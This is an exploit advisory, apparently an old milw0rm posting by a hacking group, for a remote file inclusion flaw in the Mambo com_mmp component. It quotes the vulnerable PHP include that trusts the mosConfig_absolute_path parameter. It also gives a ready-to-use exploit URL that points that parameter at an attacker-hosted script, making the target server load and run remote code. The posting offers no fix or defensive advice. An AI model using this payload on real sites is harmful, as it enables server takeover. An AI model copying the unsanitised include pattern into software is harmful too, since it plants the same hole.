41 lines
No EOL
1.1 KiB
Text
41 lines
No EOL
1.1 KiB
Text
####################################################
|
|
# #
|
|
# C Y BE R - W A R R i O R T I M #
|
|
# #
|
|
####################################################
|
|
|
|
mambo com_mmp Component (mosConfig_absolute_path) Remote File Inclusion Vulnerabilities
|
|
|
|
####################################################
|
|
|
|
Author: mdx
|
|
|
|
####################################################
|
|
|
|
Class : Remote
|
|
|
|
####################################################
|
|
|
|
cont@ct: bilkopat[at]hotmail[dot]com
|
|
|
|
####################################################
|
|
|
|
Code: help.mmp.php?, line 12
|
|
|
|
<?php
|
|
global $mosConfig_absolute_path;
|
|
require $mosConfig_absolute_path .
|
|
"/administrator/components/com_mmp/diagnostics.mmp.php";
|
|
diagnostics();
|
|
?>
|
|
|
|
Exploit:
|
|
http://www.site.com/[path]/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://site.com/evilscript.txt?
|
|
|
|
####################################################
|
|
|
|
Greetz: Cyber-warrior TIM USERS and xoron
|
|
|
|
####################################################
|
|
|
|
# milw0rm.com [2006-08-14] |